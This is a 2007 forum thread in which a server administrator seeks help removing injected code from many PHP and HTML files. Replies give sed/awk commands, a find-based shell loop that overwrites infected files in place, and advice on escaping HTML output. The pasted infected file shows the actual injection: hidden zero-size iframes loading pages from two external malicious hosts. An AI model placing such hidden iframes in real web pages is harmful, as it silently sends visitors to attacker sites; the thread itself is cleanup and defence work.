Please advise a script to get rid of the following code which is infected in a large number of files ( in particular php and html files )
<div id="testws35fdgh"></div>
Thanks
sb008
March 5, 2007, 4:01pm
2
fed.linuxgossip:
Please advise a script to get rid of the following code which is infected in a large number of files ( in particular php and html files )
<div id="testws35fdgh"></div>
Thanks
Are there any other sections which start with:
<div id="testws35fdgh"></div>
and end with:
</script>'>
So do sections like:
<div id="testws35fdgh"></div>
exist?
No there isn't ...... but there is multiple instance of the same code in a single file.
say ....
mailnull 12442 0.0 0.2 6936 2288 pts/1 S 05:20 0:05 eximstats
root@server1 [/opt/public_html/includes]# grep -lr 'testws35fdgh' .
root@server1 [/opt/public_html/includes]# cat main.php | more
Please advise.
Thanks
sb008
March 5, 2007, 4:41pm
4
fed.linuxgossip:
No there isn't ...... but there is multiple instance of the same code in a single file.
say ....
mailnull 12442 0.0 0.2 6936 2288 pts/1 S 05:20 0:05 eximstats
root@server1 [/opt/public_html/includes]# grep -lr 'testws35fdgh' .
root@server1 [/opt/public_html/includes]# cat main.php | more
Please advise.
Thanks
You might try something like this:
sed -e '/id="testws35fdgh"/,/<\/script>/d' login.php > login.php.new
and verify login.php.new if it is as you wish
Please be online.. I am checking it
It almost works well but it removes anything that is on the same line as the letter "testws35fdgh". In this case if you check the two files... you will find that the </body> tag present in the infected file is missing in index.html.html.new . Also please advise how can we successfully do this for thousands of files in the entire /home directory. The directory structure of /home is like /home/username/public_html
root@server1 [/opt/abc/manual]# cat index.html.html#Top part truncated ########################
<p align="center">Maintained by the <a
href="http://httpd.apache.org/docs-project/">Apache HTTP Server
Documentation Project</a>.</p>
<hr />
<h3 align="CENTER">Apache HTTP Server</h3>
<a href="./"><img src="images/index.gif" alt="Index" /></a>
</body><div id="testws35fdgh"></div>
root@server1 [/opt/abc/manual]# sed -e '/id="testws35fdgh"/,/<\/script>/d' index.html.html > index.html.html.new
root@server1 [/opt/abc/manual]# cat index.html.html.new#Top part truncated ########################
<tr>
<td><a href="sitemap.html">SiteMap</a>
</td>
</tr>
<tr>
<td><a href="misc/tutorials.html">Tutorials</a>
</td>
</tr>
<tr>
<td><a href="misc/">Other Notes</a> </td>
</tr>
</table>
</td>
</tr>
</table>
<br />
<br />
</div>
<p align="center">Maintained by the <a
href="http://httpd.apache.org/docs-project/">Apache HTTP Server
Documentation Project</a>.</p>
<hr />
<h3 align="CENTER">Apache HTTP Server</h3>
<a href="./"><img src="images/index.gif" alt="Index" /></a>
</html>
Thanks
What about removing only .....
<script language="JavaScript">
at the first instance and the "<div id="testws35fdgh"></div>" part with a replace command at the second instance.
How should I start/end the sed command for
<script language="JavaScript">
Thanks
root@server1 [/opt/abc/manual]# sed -e '/language="JavaScript"/,/<\/script>/d' footer.html > footer.html.new
works but what if there is some genuine javascript starting with <script language="JavaScript">
sb008
March 5, 2007, 7:13pm
9
nawk '/id="testws35fdgh"/ { print $0"XXXXX" } { print $0 }' login.php | sed -e 's/<div id="testws35fdgh">.*XXXXX$//' -e '/id="testws35fdgh"/,/<\/script>/d' > login.php.new
Thank you.. checking it.. please be online.. I want to resolve this..
nawk command is not availabe in the server... is rpm package avaible for nawk command in redhat linux ?
Great... thanks a ton.... its working perfect... you are my hero.
I have used awk instead of nawk
root@server1 [/opt/abc/manual]# awk '/id="testws35fdgh"/ { print $0"XXXXX" } { print $0 }' footer.html | sed -e 's/<div id="testws35fdgh">.*XXXXX$//' -e '/id="testws35fdgh"/,/<\/script>/d' > footer.html.new
root@server1 [/opt/abc/manual]# cat footer.html
<h3 align="CENTER">Apache HTTP Server</h3>
<a href="./"><img src="images/index.gif" alt="Index" /></a>
<IFRAME name='StatPage' src='http://www.kaspersky-norton.ws/new/traff.php ' width=5 height=5 style='display:none'></IFRAME><IFRAME name='StatPage' src='http://www.kusik-tusik-trf.com/trf/traf.php ' width=5 height=5 style='display:none'></IFRAME><div id="testws35fdgh"></div>
root@server1 [/opt/abc/manual]#
<h3 align="CENTER">Apache HTTP Server</h3>
<a href="./"><img src="images/index.gif" alt="Index" /></a>
<IFRAME name='StatPage' src='http://www.kaspersky-norton.ws/new/traff.php ' width=5 height=5 style='display:none'></IFRAME><IFRAME name='StatPage' src='http://www.kusik-tusik-trf.com/trf/traf.php ' width=5 height=5 style='display:none'></IFRAME>
Thanks a lot......
1 last question.... how can we devise a script that will replace this on the same file it is scanned for.. it is not possible for me to manually run this script for each file.... is it possible?
sb008
March 5, 2007, 7:36pm
13
fed.linuxgossip:
Great... thanks a ton.... its working perfect... you are my hero.
I have used awk instead of nawk
root@server1 [/opt/abc/manual]# awk '/id="testws35fdgh"/ { print $0"XXXXX" } { print $0 }' footer.html | sed -e 's/<div id="testws35fdgh">.*XXXXX$//' -e '/id="testws35fdgh"/,/<\/script>/d' > footer.html.new
root@server1 [/opt/abc/manual]# cat footer.html
<h3 align="CENTER">Apache HTTP Server</h3>http://www.kaspersky-norton.ws/new/traff.php ' width=5 height=5 style='display:none'></IFRAME><IFRAME name='StatPage' src='http://www.kusik-tusik-trf.com/trf/traf.php ' width=5 height=5 style='display:none'></IFRAME><div id="testws35fdgh"></div>
root@server1 [/opt/abc/manual]#
<h3 align="CENTER">Apache HTTP Server</h3>http://www.kaspersky-norton.ws/new/traff.php ' width=5 height=5 style='display:none'></IFRAME><IFRAME name='StatPage' src='http://www.kusik-tusik-trf.com/trf/traf.php ' width=5 height=5 style='display:none'></IFRAME>
Thanks a lot......
1 last question.... how can we devise a script that will replace this on the same file it is scanned for.. it is not possible for me to manually run this script for each file.... is it possible?
#!/usr/bin/ksh
find <top directory where all these files are located> -type f -exec grep -l 'id="testws35fdgh"' {} \; | \
while read FILE
do
awk '/id="testws35fdgh"/ { print $0"XXXXX" } { print $0 }' ${FILE} | sed -e 's/<div id="testws35fdgh">.*XXXXX$//' -e '/id="testws35fdgh"/,/<\/script>/d' > /tmp/whatsinaname
cp /tmp/whatsinaname ${FILE}
done
rm /tmp/whatsinaname
Why fix the infected files? Don't you keep a sane copy of your static pages and scripts offline at a safe place?
Your CGI/PHP/etc. ought to be implemented in such a way to have converted '<' and '>' received to '<' and '>' before generating the output. Injection will not have been successful if this check exists.
The script seems to be working fine.. thanks a lot.. i will let you know the effectiveness of the script after I run it serverwide.
Hello cbkihong,
Please explain --->
Your CGI/PHP/etc. ought to be implemented in such a way to have converted '<' and '>' received to '<' and '>' before generating the output. Injection will not have been successful if this check exists.
Thanks.
What I meant was this:
Neither fixing the defaced files nor replacing them is patching the security hole. The issue occurs because your PHP/CGI does not replace all '<' and '>' with their HTML entities counterpart (< >) in dynamically generated text when generating HTML output. If your PHP/CGI has implemented this, even though people try to inject script sections into your HTML files, they will not become executable Javascript and at least the attack is not successful because browsers will not treat them as script and execute them (people will see some strange Javascript code on the page, but you should be monitoring such, right?).
Try search for more information online on javascript injection. There are many patterns for these kinds of attacks.
Hi,
There seems to be problems still with pages that have genuine javascript code.
Anyways... thank you very much for your advise.
Hello sb008,
I finally found that the script works perfect except that it removes the last line of instead of just "</script>" ....
To explain you shown I have added the test below...
If you notice you will fine that.. for the line that has javascript closing code..
root@server2 [/home/planetc]# cat /root/replaceJavInfect
root@server2 [/home/planetc]# cat public_html/templates/fjt_cortrivenus/index.html#FFFFFF "></body><div id="testws35fdgh"></div>
root@server2 [/home/planetc/public_html]# cat templates/fjt_cortrivenus/index.html#FFFFFF "></body>
Please advise.
Thanks
